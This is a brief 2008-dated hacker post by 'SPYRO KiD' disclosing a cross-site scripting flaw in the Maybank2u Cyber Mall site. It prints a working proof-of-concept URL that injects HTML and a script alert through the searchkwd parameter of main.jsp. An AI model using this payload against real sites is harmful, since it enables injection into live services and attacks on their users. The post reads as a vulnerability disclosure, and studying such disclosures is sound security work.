Maybank2u Cyber Mall Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: maybank2u.net XSSED by SPYRO KiD}

PoC (payload carried in the searchkwd parameter of main.jsp):

http://mall.maybank2u.net/main.jsp?pageid=SearchResult&searchkwd=%3Ccenter%3E%3Ch1%3EXSSED%3C/h1%3E%3Cbr%3Eby%3Cbr%3E%3Ch2%3ESPYRO%20KiD%3Cscript%3Ealert('%5Ct%5Ct%5Ct%20%20%20%20XSSED%5Cn%5Ct%5Ct%5Ct%5Ctby%5Cn%5Ct%5Ct%5CtSPYRO%20KiD%5Cn%5Ct%5Cthttp://spyrozone.net');%3C/script%3E%3Cnoscript%3E


//E.O.F